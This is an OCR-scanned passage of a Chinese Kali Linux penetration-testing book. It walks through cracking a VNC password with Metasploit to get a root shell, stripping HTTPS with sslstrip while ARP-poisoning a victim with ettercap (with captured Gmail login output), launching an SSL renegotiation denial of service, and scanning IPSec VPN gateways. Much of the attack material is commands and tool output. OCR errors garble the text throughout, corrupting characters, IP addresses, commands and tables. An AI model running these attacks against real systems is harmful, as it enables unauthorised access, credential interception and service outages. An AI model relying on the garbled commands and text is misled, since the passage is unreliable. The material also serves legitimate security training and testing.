所 有 大 写字 母 〈 比 如 A) 和 数字 0 到 9 (Hil) 。 


你 也 可 以 添加 特殊 字符 生成 列表 ,但 是 ， 这 时 你 需要 在 -x 选项 附近 添加 单 引 号 ， 如 下 命令 所 示 : 


root@kali:~# -L user.lst -V -x '6:8:aAl !@#S' <IP address> SSH 
10.2. 利用 第 三 万 远程 访问 应 用 程序 
用 于 提 作 曾经 广 受 欢迎 。 哩 然 它们 将 被 GoOToMyPC 或 LogMeln 等 在 线 服 务 所 取代 ， 但 


共 远 程 访问 的 旁 路 系统 协议 应 用 程序 ， 
它们 仍然 相当 普 声 。 这 样 的 程序 例子 包括 pcAnywhere 和 VNC。 


应 该 指出 的 是 ， 由 于 系统 管理 员 的 合法 操作 ， 
因为 攻击 者 想 要 一 种 远程 访问 网 络 的 工具 。 


这 些 工具 实例 可 能 存在 于 网 络 上 。 然 而 ， 它 们 也 可 能 


在 接 下 来 的 例子 中 ， 我 们 将 使 用 Metasploit 框 染 内 置 的 功能 破解 VNC。 
1. 使 用 nmap 定 位 目标 远程 访问 软件 。 如 图 10.6 所 示 ，VNC 通 党 是 在 TCP 的 病 口 号 5900 处 被 友 现 。 


2. 在 终端 窗口 中 使 用 msfconsole 命 令 激 活 Metasploit 框 加。 在 msf 的 提示 下 ， 通 过 配置 来 入 侵 VNC， 如 图 10.7 所 示 。 


子 任 于 已 被 入 侵 的 网 络 ， 


5900/tcp open vnc VNC [protocol 3.3) 
| vnc-1inTo: 

| Protocol version: 3.3 

| security types: 

| Unknown security type (33554432) 


图 10.6 使 用 nmap 定 位 VNC 


msf > use auxiliary/scanner/vnc/vnc login 

msf auxiliary(vnc Login) > set RHOSTS 192.168.75.129 
RHOSTS => 192.168./5.129 

msf auxiliary(vnc Login) > set STOP ON SUCCESS true 
STOP ON SUCCESS => true 

mst auxiliary(vnc Login) > rn 


图 10.7 使 用 配置 入 侵 VNC 


3. 如 图 10.8 所 示 ， 局 动 run 命 令 ， 并 观察 成 功 后 的 效果 。 
msf auxiliary(vnc login) > run 


[*] 192.168.75.129:5900 - Starting VNC lcgin sweep 

[*] 182.158.75.129:5800 VNC = [1/2] - Attempting VNC login with password '' 
[*] 192.168.75.129:5900 VNC - [1/2] - , VNC server protocol version : 3.3 
[-] 192.168.75.129:59606 VNC - [1/2] - , Authentication failed 

[*| 192.168./5.129:5900 VNC - [2/2] - Attempting VNC Login with password  passwo| 
rd' 

[*] 


197.168.75.129:5900 VNC - [2/2] = , WNC server protocol version : 3.3 
192.168./5.1298:5900, VNC server password : "password" 

Scanned 1 of 1 hosts (190% complete) 

Auxiliary module execution completed 

auxiliary(vnc login) > | 


图 10.8 ”执行 run 命令 


4 最后， 一旦 Metasploit 通 过 使 用 vncviewer 登 录 到 VN5C 客 户 痕 ， 确 定 了 凭证 并 对 其 进行 了 验证 。 即 可 在 终端 窗口 命令 提示 
符 下 输入 以 下 命令 : 


root@kali:~# vncviewer <Target IP> 


这 将 连接 远程 主机 上 且 提 示 你 输入 正确 的 凭证 。 当 身份 验证 成 功 后 ， 将 打开 一 个 新 的 窗口 ， 人 允许 你 远程 访问 目标 系统 。 如 图 
10.9 所 示 ， 通 过 友 行 whoami 碍 询 和 请 求 系统 的 ID 或 |P 地 址 ， 确 定 你 已 成 功 登 录 该 目标 系统 。 


File Edit View Search Terminal Help 
root@kali:~# vncviewer 192.168.75.129 
Connected to RFB server, using protocol version 3.3 
Performing standard VNC authentication 
Password: 

Authentication successful 


TightVNC: root's X desktop (metasploitable:O) 


JJ. "m = = = 证 二 = =z bm = i 
, rooi aimerasp 1 OllaL i 已 ， 


irootlimetasploitablez/$& whoami && id 
root 

juid=O(root) gid-zü(root) 
rootimetasploitable:/# 


图 10.9 AX iE 


10.3 KERTBE 


安全 套 接 字 层 (Secure Sockets Layer, SSL) MEARE, LEHR (Transport Layer Security, TLS) 是 用 于 在 互 
联网 上 提供 安全 通信 的 加 密 协议 。 这 些 协议 被 广泛 应 用 于 互联 网 通信 、 电 子 邮件 、 网 页 浏览 和 IP 电 话 等 应 用 的 安全 程序 上 。 


这 些 协议 在 互联 网 上 无 处 不 人 在, 但是， 它们 起 源 于 90 年 代 中 期 ， 且 随 着 年 龄 的 增长 受到 的 攻击 越 来 越 多 。SSL 2.0 版 本 (1.0 
版 本 从 未 公开 上 友 布 ) 包含 大 量 可 以 被 利用 的 缺陷 ， 如 较 弱 的 密 钥 管 理 和 中 国人 攻击 的 脆弱 点 。 昌 然 大 多 数 用 户 已 经 使 用 3.0 版 本 
的 TLS 协 议 ， 但 配置 错误 的 系统 可 能 仍然 允许 使 用 早期 不 安全 的 版 本 。 


10.3.1 JJSSLv2}J Kali 


在 侦察 阶段 开始 之 前 ， 确 认 Kali 已 经 配置 了 ssL 版 本 2 的 扫 摘 协议 。 在 写 这 本 书 的 时 候 ， 所 有 的 工作 已 做 好 。 


从 终端 窗口 中 ， 输 入 以 下 命令 : 


root@kali:~# openssl s client -connect 
www.opensecurityresearch.com:443 -ssl12 


如 果 它 返回 一 个 unknown option-ssl2 (未 知 选 项 -ss12) 错误 (如 图 10.10 所 示 ) ， 那 么 就 需要 增加 配置 。 


和 mi opengl, s client -connect www.opensecurityresearch.com:443 -ssl2 


-host host - use -connect instead 

10.10 34 unknown option-ssl2447% 
为 了 应 用 补丁 ， 你 必须 使 用 下 面 的 步骤， 重新 修补 OpenSSL 应 用 程序 (确保 使 用 反映 了 下 载 目 录 的 路 径 ) 。 
1. 使 用 如 下 命令 ， 安 装 quilt， 一 个 用 于 为 应 用 程序 的 源 代码 管理 多 个 补丁 的 程序 : 


root@kali:~# apt-get install devscripts quilt 


2. 下 载 openss| 源 代码 ， 验 证 应 用 补丁 ， 更 新 配置 文件 ， 然 后 使 用 下 列 命令 重建 应 用 程序 : 
root@kali:~# apt-get source openssl 
root@kali:~# cd openssl-1.0.1e 
rootGkali:-/openssl-1.0.1e& quilt pop -a 

3. 编 辑 /openssl-1.0.1e/debian/patches/series 文 件 ， 然 后 从 文件 中 删除 如 下 命令 行 : 


ssltest no sslv2.patch 


4. 编 辑 /openssl-1.0.1e/debian/rules 文 件 和 删除 no-ssl2 的 内 容 。 然 后 使 用 以 下 命令 企 openss| 上 重新 应 用 补丁 : 
root@kali:~/openssl-1.0.le# quilt push -a 
root@kali:~/openssl-1.0.le# dech -n 'Allow SSLv2' 

5. 当 这 个 过 程 完 成 后 ， 重 建 并 重新 安装 openss| 包 。 这 一 步 可 以 通过 执行 以 下 命令 实现 : 


root@kali:~/openssl-1.0.le# dpkg-source  --commit 
root@kali:~/openssl-1.0.le# debuild -uc -us 
root@kali:~/openss1-1.0.le# cd /root 

root@kali:~# dpkg -i *ssl*.deb 


6. 通 过 ssLv2 补 及 连接 命令 ， 确 认 补 丁 已 成 功 应 用 ， 如 图 10.11 所 示 。 


Kali 脚 本 依赖 openss|， 尤 其 是 sslscan 程 序 ， 需 要 重新 编译 。 重 新 编译 时 ， 首 先 要 下 载 源 代 码 ， 然 后 重建 它 。 当 这 个 过 程 完 
成 后 ， 使 用 如 下 命令 重新 安装 ss| 扫 描 工 具 : 


root@kali:~# openssl s client -connect www.opensecurityresearch.con:443 -ssl2 
CONNECTED ( 00000003) 
write:errno=104 


no peer certificate available 


mur um um 


No client certificate CA names sent 


ooL handshake has read © bytes and written 45 bytes 


New, (NONE), Cipher is (NONE) 
Secure Renegotiation IS NOT supported 
Compression: NONE 
Expansion: NONE 
SSL -Session: 
Protocol : SSLv2 


图 10.11 确认 补丁 成 功 应 用 


root@kali:~# apt-get source sslscan 
root@kali:~# cd sslscan-1.8.2 
root@kali:~/sslscan-1.8.2# debuild -uc -us 
root@kali:~/sslscan-1.8.2# cd /root 
rootl@kali:-# dpkg -i *sslscan*.deb 


Kali 关 注 的 SSLv2 的 问题 可 能 人 在 未 来 友 行 的 版 本 中 家 修复 ， 因 此 ， 应 在 测试 SSL 连 接 之 前 验证 这 一 点 。 
10.3.2 SSL 连接 的 侦察 


评估 SSL 连 通 性 ， 尤 其 是 审查 下 列 事项 时 ， 杀 链 的 侦察 阶段 仍然 十 分 重要 : 
-在 建立 安全 SSIL 连 接 时 ， 识 别 参与 者 的 x.509 证 书 。 

:正在 使 用 的 加 密 类 型 。 

-配置 信息 ， 例 如 SSL 会 话 的 目 动 协商 是 否 是 允许 的 。 


SSL 证 书 可 以 提供 用 于 促进 社会 工程 的 信息 。 


更 加 频繁 的 是 ， 一 个 测试 者 或 攻击 者 想 要 确定 证 书 是 否 有 效 。 无 效 证 书 可 能 源 于 验证 签名 时 的 一 个 错误 ， 证 书 链 毁 坏 ， 在 证 
书 中 指定 的 域 没有 匹配 该 系统 ， 或 者 证 书 已 经 过 期 、 被 撤销 ,或 者 是 已 知 的 被 破解 了 。 


如 果 一 个 用 户 曾 接收 到 无 效 的 证 书 ， 他 将 极 有 可 能 接收 到 新 的 无 效 十 书 ， 从 而 使 攻击 者 的 工作 变 得 容易 很 多 。 


用 于 保护 SSL 连 接 的 加 密 类 型 特别 重要 。 加 密 密 码 分 为 以 下 几 类 : 


` 空 密码 (null ciphers) : 这 些 密码 用 来 验证 传输 的 真实 性 和 /或 完整 性 。 因 为 没有 应 用 加 密 ， 所 以 不 提供 任何 安全 性 。 


JJA (weak ciphers) : 这 个 术语 用 来 描述 所 有 秘 钥 长 度 为 128 位 或 少 于 128 位 的 密码 。 至 于 密 钥 交换 协议 中 使 用 的 Diffie-Hellman 算 
法 也 可 以 被 认为 是 弱 密 码 ， 因 为 它们 不 能 抵抗 中 则 人 攻击 。 由 于 碰撞 攻击 ，MD5 散 列 函数 的 使 用 也 被 认为 古 不 安全 的 。 最 后 ， 最 近 针 对 RC4 的 
攻击 也 是 因为 这 个 问题 。 


JEU (strong ciphers) : 这 些 都 是 密 钥 超过 128 位 的 密码 。 目 前 普 壳 接受 的 最 安全 的 是 256 位 的 AES 加 密 。 如 有 果 可 能 的 话 ，AES 应 该 在 
WME PL/i t8. CGalois/Counter) 模式 中 使 用 ， 它 是 一 个 同时 文 持 认证 和 加 黎 的 现代 分 组 黎 人 码 。 


SSL 和 TLs 依 靠 密码 组 件 (认证 、 加 密 和 消息 认证 码 算法 的 特定 组 合 ) 为 每 个 连接 建立 安全 设置 。 这 有 30 多 个 这 样 的 密码 组 
件 ， 频 每 地 为 每 个 安全 需求 选择 最 好 选项 的 算法 是 复杂 的 ， 这 导致 用 户 违约 选择 不 太 安全 的 选项 。 因 此 ， 每 个 3SL 和 TLC 连 接 必 


须 被 全 面 测 试 。 
使 用 nmap 或 SSL 特 定 应 用 程序 的 NSE 模 块 ， 对 SSL 连 接 进 行 侦察 ， 对 nmap NSE 模 块 的 摘 述 如 表 10.1 所 示 。 


表 10.1 nmap NSE 模 块 的 描述 


Nmap NSE 模块 模块 作用 
ssl-cert 获取 服务 器 的 SSL 证 书 。 人 信息 的 返回 数量 取 雇 于 元 长 的 水 平 ( 空 、-w 和 -vv) 
ssl-date M. TLS 的 服务 而 的 Hello 啊 应 中 获取 目标 主机 的 日 期 和 时 间 


重复 启动 SSL fil TLS — ， 每 一 次 尝试 一 个 新 的 密码 并 对 主机 的 接受 或 拒绝 进行 记录 
密码 由 强 率 表示 ， 这 是 一 个 高 度 侵 入 式 扫 描 ， 且 可 ame ee 

查询 谷歌 证 书目 录 ， T 检索 属于 SSL 证 书 的 信息 Eb 人 殿 最 近 如 何 、 持 续 时 间 ， 
以 及 谷歌 已 经 知道 的 证 书 等 信息 。 如 果 一 个 证 书 不 被 谷歌 认可 ， 它 可 能 是 可 疑 / 假 的 

榨 查 一 个 主机 使 用 的 SSL 证 书 是 否 有 与 已 破解 ， 或 徊 放 密 铀 的 数据 库 相 匹配 的 指纹 。 目 
H, CEH LittleBlackBox on 然而 ， 任 何 指 纹 数 据 库 均 可 被 使 用 
sslv2 而 定 服务 器 是 知 支 持 过 时 的 、 全 相对 较 弱 的 SSL 版 本 2， 以 及 版 本 2 上 所 支持 的 密码 


ssl-enum-ciphers 
ssl-google-cert-catalog 


ssl-known-key 


可 以 使 用 以 下 命令 ， 从 命令 行 调用 一 个 脚本 : 
root@kali:~# nmap --script <script name> -p 443 <Target IP> 


在 下 面 的 示例 中 ，ssl-cert 脚 本 是 由 最 大 元 长 的 -vv 选项 调用 的 。 从 这 个 脚本 中 得 到 的 数据 如 图 10.12 所 示 。 


Nmap scan repcrt for ( ) 
Host is up (0.24s Latency). 

Scanned at 2014-02-17 17:00:22 EST for 1s 

PORT STATE SERVICE 

443/tcp open https 

| ssl-cert: Subject: commonName= /organizationName-www. net /ol 
rganizationallnitName-Domain Control Validated 

| Issuer: commonName=Go Daddy Secure Certification Authority/organizationName-Go| 
Daddy.com, Inc ./stateOrProvinceName=Arizora/count ryName-US/organizat-onalUnitNam 
e=http://certificates .godaddy.com/repository/serialNumber= /localityName- 
scottsdale 

| Public Key type: rsa 

| Public Key bits: 2048 

| Not valid before: 20813-01-21118:51:21-4«03:00 

| Not valid after: 32016-02-18T00:10:43403:00 

| MUS: 1969 a848 a3ea obaf 

| SHA-1: 3589 498c llfc = 112e 81a8 aeda 

| «BEGIN CERT IFICATE=+++= 

| MIIFrDCCBJSCcAwIBAgaIHKAf] fduWwiDANBakqgqhkis39wOBAQUFADCBYy j ELMAKGATUE 

| 

| 

| 


图 10.12 ”调用 ssl-cett 脚 本 获得 的 信息 
在 侦察 期 间 ， 测 试 人 员 可 以 选择 使 用 下 面 的 命令 ， 局 动 所 有 的 SSL 特 有 模块 : 


root@kali:~# nmap --script "ssl*" <IP address> 


针对 SSL 和 TLs 的 Kali 侦 察 和 攻击 工具 ， 可 以 从 命令 行 或 从 菜单 Kali Linux|Information Gathering|SSL Analysis 引 导 调 用 。 
这 些 工具 的 总 结 如 表 10.2 所 示 。 


表 10.2 ”针对 SSL 和 TLS 的 Kali 侦 察 和 攻击 工具 介绍 表 


IR 功能 
ssicaudit | ”自动 化 测试 SSL 和 TLS 客户 端 ， 确 定 抵抗 中 间 人 攻击 的 能 为 


对 SSLv3 和 TLS 通信 进行 网 络 协议 分 析 。 如 果 使 用 合适 的 密 钥 ， 可 以 破译 SSL 通信 ， 并 通过 文字 显 
ssldump 


7 | Ht HE 
ssiscan frit] SSL Hit 55 of tpa FSP PaaS. day LT Ae SSL 密码 和 在 文本 及 XML fits ons ys 3 
"m 确保 中 间 人 攻击 条 件 ， 在 一 个 特定 局 域 网 上 的 所 有 SSL 连接 有 效 ， 为 那些 处 于 忙碌 状态 的 域 动态 生成 
sslsniff "ie 
ues 
对 SSL AI TLS 网 络 执行 中 间 人 攻击 。 通 过 一 个 网 络 地 址 转换 名 和 对 sslsplit 的 重 定向 ， 截 获 透 明 的 网 


sslsplit | 络 链 接 。 它 可 以 终止 RING ANE 的 地 的 连接 ， 同 时 记录 所 有 传输 的 数据 。 它 文 
持 TCP, SSL, HTTP/HTTPs, IPv4 及 IPv6 


设计 透明 的 网 络 ， 和 截获 HTTP 流量 ， 关 注 HTTPS 链接 ， om Fe ax ute gt pz po op E Ed HTTP 或 


sslstrip a — AB TRE —P——Ü 

P | HTTPS fee, EARRAN TEH — TER, aR IR -T bh. LAI Ta AIEEE H x 
sslyze TITIRI ashy SSL 配置 
tlssled 结合 几 个 SSL 特定 应 用 程序 的 使 用 和 输出 ， 检 查 加 密 强 度 、 证 书 参 数 和 重新 协商 能 力 


最 常用 的 程序 是 ss| 扫 描 ， 它 查询 SSL 服 务 以 确定 证 书 的 详细 信息 和 其 支持 的 密码 ， 并 以 文本 和 和 XML 格式 输出 。 


当 使 用 --no-failed 选 项 测试 一 个 特定 的 连接 时 ，sslscan 只 显示 其 接受 的 密码 组 件 ， 如 图 10.13 所 示 。 


Testing 


Version 1.6.2 


http://www .titanla.co.uk 
Copyright lan Yentura-whiting #2009 


Ser 


ES m 


on port 443 


supported Server Cipher(sj: 
Accepted Solv2 168 bits DES-CBC3-MD5 
Accepted 3SSLvz 128 bits RC4-MD5 
Accepted SsLv3S 168 bits DES-CBC3-SHA 
Accepted SS5Lv3 128 bits RC4-SHA 
Accepted SSLvs 128 bits RC4-MD5 
Accepted JLSvl 2756 bits ECDHE-HSA-AES2hb6 -SHA 
Accepted TLSvl 256 bits AES#255-SHA 
Accepted ILSvl 168 bits DES-LBC3-SHA 
Accepted ILSvl 128 bits ECDHE-RSA-AESI]28-SHA 
Accepted [ILSvl 128 bits AES1#28-SHA 
Accepted TLSvl 128 bits RG4-SHA 
Accepted 1L5 128 bits RC4-MD5 

Prefered Server Cipher(s) : 
SSLv2? 1658 bits DES-CBC3-MD5 
SSLv3 128 bits RC4-SHA 
TILSv] 128 bits AES128-SHA | 

图 10.13” 调用--no-failed 选 项 ， 显 示 密 码 组 件 


sslyze python 工 具 分 析 服 务 器 的 SSL 配 置 、 验 证 证 书 的 有 效 性 、 测 试 弱 密码 组 件 、 确 定 可 以 支持 更 多 攻击 的 配置 信息 。 如 图 
10.14 所 示 ， 示 例 输出 中 已 经 确认 一 个 证 书 不 匹配 一 些 攻击 类 型 。 


另 一 个 SS 侦察 工具 是 tlssled， 如 图 10.15 所 示 。 它 运行 速度 快 ， 操 作 简 单 ， 且 输出 对 用 户 友 好 。 


不 管 你 用 什么 方法 进行 SSL 侦 察 ， 确 保 你 已 通过 运行 至 少 两 种 不 同 的 工具 交叉 验证 了 你 的 结果 。 此 外 ， 所 有 的 SSL 配 置 设备 
并 不 是 同时 在 线 。 因 此 ， 在 大 型 网 络 上 ， 确 保 你 在 测试 过 程 中 ， 多 次 扫描 了 SSI 漏 洞 


SCAM RESULTS FOR. 10. 443 - 10, 443 


* Compression ; | 
Compression Support: Disabled 


* Session Renegotiation mE | 
Client-initiated Renegotiations: Rejected 
secure Renegotiation: Supported 
* Session Resumption | 
with Session IDs: | Supported (5 successful, O failed, O errors, 5 total attempts). 
With TLS Session Tickets: Not Supported - TLS ticket not assigned. 
* TLSV1 2 Cipher Suites 
Rejected Cipher Suite(s): Hidden 
Preferred Cipher Suite: None 
Accepted Cipher Suite(s): None 
Unknown Errors: None 
* TLSV1 1 Cipher Suites 
Rejected Cipher Suite(s): Hidden 
Preferred Cipher Suite: None 
Accepted Cipher Suite(s): None 
Unknown Errors: None 
"Certificats : | — | 
Validation w/ Mozilla's CA Store: Certificate is Trusted 


Hostname Validation: MISMAT CH 
SHA] Fingerprint: 490741] 149854 39AOE2291]153bEAOFSAZOEBSSD /FZ20C8 


图 10.14 ”扫描 结果 


rootikats: ~# tlssled 443 
TLSSLed - (1.2) based on en i c — 
by Raul Siles (www.taddong.com) 


+ openssl version: OpenSSL 1.0.1e 11 Feb 2013 
+ sslscan version 1.8.2 


J 


[-] Analyzing SSL/TLS on :443 
[*] The target service :443 seems to speak SSL/TLS... 
[-] Running sslscan on :443... 


[*] Testing for SSLv2 
[*] Testing for NULL cipher 
[*] Testing for weak ciphers (based on key length) 
[*|] Testing for strong ciphers (AES) ... 
Accepted [LSvl 256 bits ECDHE-RSA-AES256-SHA 
Accepted TLSvl 256 bits  AES256-SHA 
Accepted TLSvl 128 bits .ECDHE-RSA-AES128 -SHA 
Accepted TLSvl 128 bits AES128-SHA 


[*] Testing for MD5 signed certificate 


[*] Testing for certificate public key Length 
RSA Publie Key: (1024 bit) 


[“] Testing for certificate subject 
subject: /CN=webapps. © .com 


图 10.15 ”运行 tlssled 


Naw 采 ， 一 个 最 新 发 展 起 来 的 工具 是 ONASP 的 O-Saft Cwww.owasp.org/index.php/O-Saft) ， 它 提供 了 SSI 配 置 、 密 码 、 证 书 数 据 的 全 


10.3.3 ”使 用 sslstrip 进 行 中 间 人 攻击 曝光 


尽管 39L 提 供 安全 保护 ， 但 仍 有 一 些 针对 该 协议 的 有 效 攻击 。 在 2009 年 ，Moxie Marlinspike 演 示 了 sslstrip， 一 个 用 于 网 络 
上 透明 地 劫持 HTTP 流 量 ， 并 且 重 定向 HTTP 或 HTTPS 链 授 的 流量 工具 。 它 消除 了 SSL 的 保护 ， 并 向 受 表 者 的 浏览 器 返回 安全 锁 图 
标 ， 致 使 流量 拦截 不 容易 被 侦察 到 。 


倘 而 言 之 ，sslstrip 对 SSL 友 起 中 间 人 攻击 ， 人 致使 之 前 的 安全 数据 被 截获 。 


使 用 sslstrip， 首 先 必须 使 用 以 下 命令 ,配置 拦 截 系统 为 转 友 模 式 ,: 


root@kali:~# echo "1" > /proc/sys/net/ipv4/ip forward 


接 下 来 ,设置 iptables 防 火 墙 ， 直接 使 用 以 下 命令 重 定向 sslstrip 的 HTTP 流 量 : 


root@kali:~# iptables -t nat -A PREROUTING -p tcp 
-destination-port 80 -jJ REDIRECT -to-port <listenport> 


在 这 个 例子 中 ， 我 们 设置 监听 端口 号 为 5353。 
配置 完成 后 ， 使 用 下 面 的 命令 运行 sslstrip: 
root@kali:~# sslstrip -1 5353 


上 述 命令 的 执行 结果 ， 如 图 10.16 所 示 。 


root@kali:~# echo "1" > /proc/sys/net/ipv4/ip forward 

root@kali:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIR 
ECT --to-port 5353 

root@kali:~# sslstrip -L 5353 


ssistrip 0.9 by Moxie Marlinspike running... 


图 10.16 ”和 运行 sslsttip — 1 5353 

最 小 化 的 活动 终端 窗口 正在 执行 sslstrip， 并 打开 一 个 新 的 终端 窗口 。 使 用 ettercap 欺 骗 ARP， 并 使 用 以 下 命令 重 定向 ， 从 

网 络 或 目标 系统 拦截 系统 的 流量 : 
root@kali:~# ettercap -TqM arp:remote /192.168.75.128/ /192.168.75.2/ 

在 这 里 ，ettercap-T 分 文 只 选择 文本 界面 ，-dq 强 制 控制 台 进 入 静态 模式 ，-m 选 项 可 以 激活 中 国人 攻击 来 堆 获 和 重 定 向 数据 
©. arp: remote 选 项 实现 ARP 中 毒 攻击 ， 并 把 攻击 者 作为 有 能 力 查看 和 修改 数据 包 传 输 的 中 间 人 。remote 分 支 选项 询问 你 是 
售 想 通过 网 天 至 看 远程 |P 地 址 和 通信 。 

前 面 命令 的 执行 结果 ， 如 图 10.17 所 示 。 

如 果 目 标 系统 想 要 访问 99| 安 全 保护 的 内 容 ， 他 们 的 查询 可 以 直接 通过 网 天 到 达 拦 截 系统 。 

从 用 户 的 角度 来 看 ， 他 们 将 直接 到 网 站 ， 并 且 给 出 一 个 安全 警告 There is a problem with the site’ s security 
certificate (该 网 站 的 安全 证 书 有 问题 ) ， 促 使 他 们 决定 继续 访问 。 如 果 他 们 选择 Yes， 他 们 将 被 引导 至 他 们 选择 的 页 面 。 在 浏 
抠 器 右 下 角 的 锁 图 标 表 明 SSLIE 在 使 用 ， 这 也 表明 他 们 的 通信 和 是 安全 的 。 


root@kali:~# ettercap -TqM arp:remote /192.168.75.128/ /192.168.75.2/ 
ettercap 0.8.0 copyright 2001-2013 Ettercap Development Team 


Listening on: 
ethO -> 00:50:56:28:B4:28 
192.168.75,130/255.255.255.0 
fe80::250:56ff:fe28:b428/64 


sol dissection needs a valid 'redir command on script in the etter.conf file 
Privileges dropped :o UID 65534 GID 65534... 
33 plugins 
42 protocol dissectors 
o/ ports monitored 
16074 mac vendor fingerprint 
1766 tcp OS fingerprint 
2182 known services 


Scanning for merged targets (2 hosts)... 


3 hosts added to the hosts list... 
ARP poisoning victims: 
GROUP 1 : 192.168.75.128 00:080:28:6/ :52:D5 
GROUP 2 : 192.168.75.2 08:50:55:FC:CC:3F 
Starting Unified sniffing.. 


Text only Interface activated... 
Hit 'h' for inline help 


图 10.17 ”运行 ettetcap - TqM 


在 后 台 ，sslstrip 工 具 删 除了 ssSL， 丢 痉 可 以 在 ettercap 日 志 中 得 看 的 原始 内 容 ， 如 图 10.18 所 示 。 


HTTP : 74,125,193.84:80 -> USER: ddsslstripagmail.com PASS: INFO: http://accounts.google.com/ServiceLogin?servicesmail&pa 
lse&continue-http://mail. Jla,com/mail/5sccsl&áltmpl2default&ltmplcache-26emr 


CONTENT: GALX=WpvTUmscdKAScont inue=ht tps3A%2F%2Fmail .google.coms2Fmail %2Faservice=mailérm=falseél tmpl=defaultéscc=16 utf8- 

se=t2 LAGI tAZxNwpyeBOSx fNIJI8l19BwIAAAPOUgAAACSBqANduinX5hNAllmlXmYCiKTvT VnCSNxvVuQYpGNXCWcLO 07geom HCdISorGrT7iQt 5NE5568]]34 
ZSGOSVURQREAqreGyZixS2wgwCKZB8IOMMR-iB99k7q8Z2yB6 050AW7RAcN6aF606BKwTKwsdo TUoTEYLGFLbBP1-OtmBBhRwMiogbBXOEVvu6VSRapq6TjecssQnLE 
ere RcgS&Emailsddsslstripagmail.com&Passwd-&signIn-5Sign«in&PersistentCookie 


HTTP : 74,125,193,84:890 - | com] [PASS ; passwo a7 INFO: http: //accounts google .com/ServiceLoginAuth 
CONTENT : GAL XctipvTUnseGXAg Soe Teer formant. yc Fi 357: Teapricesmail&rmefalse&ltmpledefault&sccels ut f8: 3 


图 10.18 运行 sslstfip 工 具 


这 种 攻击 是 所 有 相同 的 第 2 层 网 段 中 唯一 有 效 的 攻击 。 然 而 ， 它 在 有 线 和 无 线 网 络 上 都 是 成 功 的 。 虽 然 ARP 重 定向 可 以 在 一 
个 网 段 中 应 用 ， 但 是 这 样 的 攻击 会 影响 网 络 市 膏 ， 并 可 能 被 检测 到 。 因 此 ， 直 接 攻 击 单 一 设备 是 最 有 效 的 。 


Rai PREROUTING 规 则 ， 用 -D 取 代 -A。 清 除 防 火 墙 规则 ， 使 用 iptables-t nat-F (刷新 命令 ) Miptables-t nat-L (确认 表 己 被 清 
HR) o 


10.3.4 ”针对 SSL 的 拒绝 服务 攻击 曝光 


当 一 个 SSL 连 接 被 建立 时 ， 服 务 器 必须 完成 一 系列 的 密集 计算 ， 去 友 起 信号 交换 并 局 动 加 密 。 这 涉及 部 分 客 己 端的 少量 计算 
工作 和 服务 器 的 大 量 计 算 工 作 。 


如 果 一 个 客 尸 端 友 起 SSL 连 接 ， 但 拒绝 服务 器 的 响应 ，SSL 连 接 将 不 会 被 建立 。 但 是 ， 如 果 SSL 服 务 器 被 配置 成 自动 协商 连 
Hr, 计算 的 工作 量 将 导致 拒绝 服务 攻击 。 


Kali Linux 有 几 个 工具 ， 人 允许 你 自己 决定 是 否 允 许 自动 重新 协商， 包括 sslyze 和 tssled。 
如 果 自 动 重新 协商 是 允许 的 ， 那 么 输入 以 下 命令 将 允许 测试 人 员 对 拒绝 服务 攻击 的 能 力 进 行 评估 : 


root@kali:~# thc-ssl- dos «IP address> <port> 


上 述 命令 的 执行 结果 ， 如 图 10.19 所 示 。 


root@kali:~# thc -ssl -dos 


\ EET. | "D M. 
| | ¥ = \/ X NK 
| ON T / N | CN 
| | x | /! X — — X 

\/ \/ 
nttp://www.thc.org 


Twitter @hackerschoice 
Greetingz: the french underground 
./thc-ssl-dos [options] «ip» «port» 


-h help 
-l «n» Limit parallel connections [default: 400] 


图 10.19 ”运行 thc-ssl-dos 命 令 


10.4 攻击 IPSec 虚拟 专用 网 络 


虚拟 专用 网 络 (virtual private network, VPN) (AAS, Bkfe]— P SERRA ISIFHP ZIRE (加 
密 ) 通信 。 有 两 种 类 型 的 虚拟 专用 网 络 : IPSec 和 39L。 


IiPSec 是 虚拟 专用 网 络 中 最 常见 的 用 于 网 络 和 连接 的 主机 之 间 建 立 安全 连接 的 协议 。 


在 IPSec 中 ， 有 以 下 几 个 执行 特定 功能 的 子 协议 ， 主 要 包括 以 下 内 容 : 


‘WES (Authentication Header, AH) : 这 对 IP 数 据 包 提供 原始 证 明 ， 保 护 它们 以 抵抗 重 放 攻击 。 


.封装 安全 有 效 载 和 荷 (Encapsulation Security Protocol, ESP) : 该 协议 提供 了 原始 传输 数据 的 真实 性 、 完 整 性 和 机 密 性 。 


.安全 关联 (Security Association, SA) : 这 是 一 套用 于 加 密 和 认证 传输 数据 的 算法 。 因 为 SA 与 一 个 方 回 上 传输 数据 相关 联 ， 双 问 通 信 
需要 一 对 安全 关联 提供 安全 性 。 安 全 关联 是 使 用 网 络 安全 协会 和 密 钥 管理 协议 (Internet Security Association and Key 
Management Protocol, ISAKMP) 建立 的 ， 它 可 以 通过 几 种 方式 来 实现 。 当 测试 VPN 的 安全 性 时 ， 其 中 一 个 最 脆弱 的 配置 依赖 预先 共 豆 密 
钥 ， 即 因特网 密 钥 交换 (Internet Key Exchange, IKE) 。 


评估 VPN 的 安全 性 ,测试 人 员 需 要 遵循 这 些 基本 步骤 : 
1. 扫 搬 存 在 的 VPN 网 天。 
2. 使 用 VPN 网 关 的 措 纹 机 制 来 确定 供应 商 和 配置 细 书 。 


3. 根 据 VPN 供 应 商 或 相 天 产品 寻找 相 天 漏洞 。 


5. 执 行 离线 PK 攻击。 


6. 检 查 用 户 的 默认 账户 。 
10.4.1 扫 摘 VPN 网 天 


扫 摘 VPN 网 天 ， 可 以 使 用 nmap 或 ike-scan。 使 用 nmap， 需 要 执行 如 下 命令 : 


root@kali@:~# nmap --sU -Pn -p 500 <IP Address> 


AGP, -sUf&znnmapfie AUDP ÞE iiS sy BEA EVE] (而 非 TCP) ，-Pn 用 于 确保 nmap 不 会 友 送 一 个 ping 扫 摘 
( 它 可 以 警告 目标 注意 本 次 扫 摘 并 且 识 别 测试 人 员 ) ， 而 -p 500 标 识 了 特定 的 扫 摘 端口 。 


由 于 nmap 处 理 I|KE 数 据 包 的 方式 ， 它 不 一 定 能 


找到 所 有 的 VPN 网 和 天。 最 有 效 的 工具 是 友 送 正确 格式 的 IKE 数 据 包 到 目标 系 
统 ， 并 显示 返回 的 消息 内 容 。 


ike-scan 是 用 来 定位 VPN 网 天 的 最 好 工具 (通过 导航 Kali Linux|Information Gathering|VPN Analysis 可 以 找到 ) 。ike- 


